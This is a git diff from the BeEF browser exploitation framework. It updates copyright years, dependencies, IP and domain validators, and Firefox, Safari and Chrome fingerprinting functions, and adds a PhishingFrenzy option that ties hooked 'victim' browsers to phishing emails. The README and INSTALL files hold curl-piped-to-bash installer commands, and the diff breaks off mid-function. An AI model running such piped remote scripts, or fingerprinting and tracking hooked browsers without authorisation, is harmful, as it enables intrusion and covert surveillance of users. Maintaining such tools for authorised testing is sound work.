Updated copyright dates

Fix sourcing rvm script as root on Ubuntu 14.04LTS

.gitignore

@@ -1,3 +1,4 @@
+### BeEF ###
 beef.db
 test/msf-test
 custom-config.yaml
@@ -6,3 +7,97 @@ custom-config.yaml
 .rvmrc
 
 *.lock
+
+extensions/metasploit/msf-exploits.cache
+
+# The following lines were created by https://www.gitignore.io
+
+### Linux ###
+*~
+
+# KDE directory preferences
+.directory
+
+
+### vim ###
+[._]*.s[a-w][a-z]
+[._]s[a-w][a-z]
+*.un~
+Session.vim
+.netrwhist
+*~
+
+
+### Emacs ###
+# -*- mode: gitignore; -*-
+*~
+\#*\#
+/.emacs.desktop
+/.emacs.desktop.lock
+*.elc
+auto-save-list
+tramp
+.\#*
+
+# Org-mode
+.org-id-locations
+*_archive
+
+# flymake-mode
+*_flymake.*
+
+# eshell files
+/eshell/history
+/eshell/lastdir
+
+# elpa packages
+/elpa/
+
+# reftex files
+*.rel
+
+# AUCTeX auto folder
+/auto/
+
+# cask packages
+.cask/
+
+
+### nanoc ###
+# For projects using nanoc (http://nanoc.ws/)
+
+# Default location for output, needs to match output_dir's value found in config.yaml
+output/
+
+# Temporary file directory
+tmp/
+
+# Crash Log
+crash.log
+
+
+### Windows ###
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Windows Installer files
+*.cab
+*.msi
+*.msm
+*.msp
+
+# Windows shortcuts
+*.lnk
+
+
+### TortoiseGit ###
+# Project-level settings
+/.tgitconfig
+

BeEFLive.sh

@@ -1,2 +0,0 @@
-# Reference for old (<1.2) versions of BeEF Live
-bash /opt/beef/liveCD/BeEFLive.sh

Gemfile

@@ -1,7 +1,7 @@
 # BeEF's Gemfile
 
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -20,9 +20,10 @@ if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("
   gem "execjs"
   gem "win32console"
 elsif !RUBY_PLATFORM.downcase.include?("darwin")
-  gem "therubyracer"
+  gem "therubyracer", "0.11.3"
   gem "execjs"
 end
+ 
 
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
@@ -38,8 +39,7 @@ gem "dm-migrations"
 gem "msfrpc-client"        # Metasploit Integration extension
 #gem "twitter", ">= 5.0.0" # Twitter Notifications extension
 gem "rubyzip", ">= 1.0.0"
-gem "rubydns"              # DNS extension
-gem "sourcify"
+gem "rubydns", "0.7.0"     # DNS extension
 gem "geoip"                # geolocation support
 
 # For running unit tests

INSTALL.txt

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -51,8 +51,8 @@ Installation
       - XCode: provides the sqlite support BeEF needs
       
       - Ruby 1.9
-      	To install RVM and Ruby 1.9.3 on Mac OS:  
-      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
+      	To install RVM and Ruby 1.9.3 on Mac OS:
+      	$ bash -s stable < <(curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
       	$ rvm install 1.9.3-p484
 		$ rvm use 1.9.3
       

README

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -48,7 +48,7 @@ __The following is for the impatient.__
 For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
 
-   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+   $ bash -s stable < <(curl -Ls https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
 
 
 Usage 

README.mkd

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -48,7 +48,7 @@ __The following is for the impatient.__
 For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
 
-       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+       $ curl -L https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
 
 
 Usage 

Rakefile

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

VERSION

@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.5.0-alpha
+0.4.6.0-alpha

beef

@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -58,6 +58,11 @@ unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
   config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
 end
 
+# @note Check if interactive was specified from the command line, therefore override the extension to enable
+if BeEF::Core::Console::CommandLine.parse[:interactive] == true
+  config.set('beef.extension.console.shell.enable',true)
+end
+
 # @note Prints BeEF welcome message
 BeEF::Core::Console::Banners.print_welcome_msg
 

config.yaml

@@ -1,12 +1,12 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.4.5.0-alpha'
+    version: '0.4.6.0-alpha'
     # More verbose messages (server-side)
     debug: false
     # More verbose messages (client-side)
@@ -119,6 +119,9 @@ beef:
         # set this to TRUE if you want to allow auto-run execution for modules with target->user_notify
         allow_user_notify: true
 
+    # Enables DNS lookups on zombie IP addresses
+    dns_hostname_lookup: false
+
     # IP Geolocation
     # NOTE: requires MaxMind database:
     #   curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
@@ -127,12 +130,21 @@ beef:
         enable: false
         database: '/opt/GeoIP/GeoLiteCity.dat'
 
+    # Integration with PhishingFrenzy
+    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
+    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
+    integration:
+        phishing_frenzy:
+            enable: false
+
     # You may override default extension configuration parameters here
     extension:
         requester:
             enable: true
         proxy:
             enable: true
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
         metasploit:
             enable: false
         social_engineering:
@@ -146,4 +158,4 @@ beef:
             enable: true
         # this is still experimental, we're working on it..
         dns:
-            enable: false
+            enable: true

core/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server/hook.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/module.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/bootstrap.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/core.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/base.rb

@@ -1,11 +1,11 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
-  
+
   # Check if the string is not empty and not nil
   # @param [String] str String for testing
   # @return [Boolean] Whether the string is not empty
@@ -24,7 +24,7 @@ module Filters
     regex = Regexp.new('[^' + chars + ']')
     regex.match(str).nil?
   end
-        
+
   # Check if one or more characters in 'chars' are in 'str'
   # @param [String] chars List of characters to match
   # @param [String] str String for testing
@@ -33,7 +33,7 @@ module Filters
     regex = Regexp.new(chars)
     not regex.match(str).nil?
   end
-        
+
   # Check for null char
   # @param [String] str String for testing
   # @return [Boolean] If the string has a null character
@@ -98,14 +98,58 @@ module Filters
     return false if not is_non_empty_string?(str)
     only?("a-zA-Z0-9", str)
   end
-        
-  # Check if valid ip address string
-  # @param [String] ip String for testing
-  # @return [Boolean] If the string is a valid IP address
-  # @note only IPv4 compliant
-  def self.is_valid_ip?(ip)
-    return false if not is_non_empty_string?(ip)
-    return true if ip =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})?$/
+
+  # @overload self.is_valid_ip?(version, ip)
+  #   Checks if the given string is a valid IP address
+  #   @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
+  #   @param [String] ip string to be tested
+  #   @return [Boolean] true if the string is a valid IP address, otherwise false
+  #
+  # @overload self.is_valid_ip?(ip)
+  #   Checks if the given string is either a valid IPv4 or IPv6 address
+  #   @param [String] ip string to be tested
+  #   @return [Boolean] true if the string is a valid IPv4 or IPV6 address, otherwise false
+  def self.is_valid_ip?(version = :both, ip)
+    valid = false
+
+    if is_non_empty_string?(ip)
+      valid = case version.inspect.downcase
+        when /^:ipv4$/
+          ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
+            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
+        when /^:ipv6$/
+          ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
+            ([0-9a-f]{1,4}:){1,7}:|
+            ([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
+            ([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
+            ([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
+            ([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
+            ([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
+            [0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
+            :((:[0-9a-f]{1,4}){1,7}|:)|
+            fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
+            ::(ffff(:0{1,4}){0,1}:){0,1}
+            ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
+            ([0-9a-f]{1,4}:){1,4}:
+            ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
+        when /^:both$/
+          is_valid_ip?(:ipv4, ip) || is_valid_ip?(:ipv6, ip)
+      end ? true : false
+    end
+
+    valid
+  end
+
+  # Checks if string is a valid domain name
+  # @param [String] domain string for testing
+  # @return [Boolean] If the string is a valid domain name
+  # @note Only validates the string format. It does not check for a valid TLD since ICANN's list of
+  #       TLD's is not static.
+  def self.is_valid_domain?(domain)
+    return false unless is_non_empty_string?(domain)
+    return true if domain =~ /^[0-9a-z-]+(\.[0-9a-z-]+)*(\.[a-z]{2,}).?$/i
     false
   end
 
@@ -138,6 +182,6 @@ module Filters
     return false if str.length > 200
     true
   end
-  
+
 end
 end

core/filters/browser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/http.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/page.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/hbmanager.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/loader.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -16,7 +16,6 @@ require 'base64'
 require 'xmlrpc/client'
 require 'openssl'
 require 'rubydns'
-require 'sourcify'
 
 # @note Include the filters
 require 'core/filters'

core/main/client/are.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/beef.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/browser.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -322,7 +322,63 @@ beef.browser = {
      * @example: beef.browser.isFF28()
      */
     isFF28: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && window.navigator.userAgent.match(/Firefox\/28./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt !== 'function' && window.navigator.userAgent.match(/Firefox\/28./) != null;
+    },
+
+    /**
+     * Returns true if FF29
+     * @example: beef.browser.isFF29()
+     */
+    isFF29: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/29./) != null;
+    },
+
+    /**
+     * Returns true if FF30
+     * @example: beef.browser.isFF30()
+     */
+    isFF30: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/30./) != null;
+    },
+
+    /**
+     * Returns true if FF31
+     * @example: beef.browser.isFF31()
+     */
+    isFF31: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/31./) != null;
+    },
+
+    /**
+     * Returns true if FF32
+     * @example: beef.browser.isFF32()
+     */
+    isFF32: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/32./) != null;
+    },
+
+    /**
+     * Returns true if FF33
+     * @example: beef.browser.isFF33()
+     */
+    isFF33: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/33./) != null;
+    },
+
+    /**
+     * Returns true if FF34
+     * @example: beef.browser.isFF34()
+     */
+    isFF34: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/34./) != null;
+    },
+
+    /**
+     * Returns true if FF35
+     * @example: beef.browser.isFF35()
+     */
+    isFF35: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/35./) != null;
     },
 
     /**
@@ -330,7 +386,8 @@ beef.browser = {
      * @example: beef.browser.isFF()
      */
     isFF: function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35();
+
     },
 
     /**
@@ -357,12 +414,28 @@ beef.browser = {
         return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
     },
 
+    /**
+     * Returns true if Safari 7.xx
+     * @example: beef.browser.isS7()
+     */
+    isS7: function () {
+        return (window.navigator.userAgent.match(/ Version\/7\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
+    },
+
+    /**
+     * Returns true if Safari 8.xx
+     * @example: beef.browser.isS8()
+     */
+    isS8: function () {
+        return (window.navigator.userAgent.match(/ Version\/8\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
+    },
+
     /**
      * Returns true if Safari.
      * @example: beef.browser.isS()
      */
     isS: function () {
-        return this.isS4() || this.isS5() || this.isS6();
+        return this.isS4() || this.isS5() || this.isS6() || this.isS7() || this.isS8();
     },
 
     /**
@@ -678,12 +751,12 @@ beef.browser = {
     },
 
     /**
-         * Returns true if Chrome for iOS 31.
-         * @example: beef.browser.isC31iOS()
-         */
-        isC31iOS: function () {
-            return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
-        },
+     * Returns true if Chrome for iOS 31.
+     * @example: beef.browser.isC31iOS()
+     */
+    isC31iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
+    },
 
     /**
      * Returns true if Chrome 32.
@@ -694,9 +767,9 @@ beef.browser = {
     },
 
     /**
-         * Returns true if Chrome for iOS 32.
-         * @example: beef.browser.isC32iOS()
-         */
+     * Returns true if Chrome for iOS 32.
+     * @example: beef.browser.isC32iOS()
+     */
     isC32iOS: function () {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 32) ? true : false);
     },
@@ -710,9 +783,9 @@ beef.browser = {
     },
 
     /**
-         * Returns true if Chrome for iOS 33.
-         * @example: beef.browser.isC33iOS()
-         */
+     * Returns true if Chrome for iOS 33.
+     * @example: beef.browser.isC33iOS()
+     */
     isC33iOS: function () {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 33) ? true : false);
     },
@@ -726,9 +799,9 @@ beef.browser = {
     },
 
     /**
-         * Returns true if Chrome for iOS 34.
-         * @example: beef.browser.isC34iOS()
-         */
+     * Returns true if Chrome for iOS 34.
+     * @example: beef.browser.isC34iOS()
+     */
     isC34iOS: function () {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 34) ? true : false);
     },
@@ -742,9 +815,9 @@ beef.browser = {
     },
 
     /**
-         * Returns true if Chrome for iOS 35.
-         * @example: beef.browser.isC35iOS()
-         */
+     * Returns true if Chrome for iOS 35.
+     * @example: beef.browser.isC35iOS()
+     */
     isC35iOS: function () {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 35) ? true : false);
     },
@@ -758,20 +831,68 @@ beef.browser = {
     },
 
     /**
-         * Returns true if Chrome for iOS 36.
-         * @example: beef.browser.isC36iOS()
-         */
+     * Returns true if Chrome for iOS 36.
+     * @example: beef.browser.isC36iOS()
+     */
     isC36iOS: function () {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 36) ? true : false);
     },
-    
+
+    /**
+     * Returns true if Chrome 37.
+     * @example: beef.browser.isC37()
+     */
+    isC37: function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 37) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 37.
+     * @example: beef.browser.isC37iOS()
+     */
+    isC37iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 37) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 38.
+     * @example: beef.browser.isC38()
+     */
+    isC38: function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 38) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 38.
+     * @example: beef.browser.isC38iOS()
+     */
+    isC38iOS: function () {
